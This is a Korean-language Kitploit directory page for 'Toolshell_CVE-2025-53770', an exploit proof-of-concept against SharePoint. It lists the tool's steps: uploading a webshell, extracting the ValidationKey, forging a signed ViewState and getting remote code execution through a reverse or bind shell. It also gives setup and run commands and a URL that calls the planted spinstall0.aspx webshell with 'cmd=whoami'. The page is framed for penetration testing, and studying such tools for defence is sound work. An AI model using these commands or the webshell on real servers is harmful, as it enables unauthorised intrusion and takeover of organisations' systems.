Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Toolshell_CVE-2025-53770 — CVE-2025-53770에 대한 익스플로잇 PoC로, SharePoint에 웹쉘 업로드, ValidationKey 추출, 서명된 ViewState 생성, 및 리버스 셸 또는 바인드 셸을 통한 원격 코드 실행을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubgreenforcenetworks/toolshell_cve-2025-53770

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Toolshell_CVE-2025-53770

CVE-2025-53770에 대한 익스플로잇 PoC로, SharePoint에 웹쉘 업로드, ValidationKey 추출, 서명된 ViewState 생성, 및 리버스 셸 또는 바인드 셸을 통한 원격 코드 실행을 가능하게 합니다.

저장소 보기
41년 전아직 검토되지 않음

ToolShell → CVE‑2025‑53770 익스플로잇 PoC

이 패키지는 다음을 수행합니다:

  1. SharePoint에 웹쉘 업로드
  2. ValidationKey 추출
  3. 서명된 ViewState 생성
  4. 리버스/바인드 셸을 통한 RCE

🔧 설정

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 실행

웹쉘 업로드

SharePoint 페이지에서 페이지 소스에 접근할 수 있습니다. 소스 보기 탭으로 이동하여 사용 가능한 경우 다음을 얻을 수 있으며 복사할 수 있습니다:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (컨텍스트를 위한 현재 __VIEWSTATE)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

이 명령은 spinstall0.aspx를 업로드합니다. 확인: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

도구 다운로드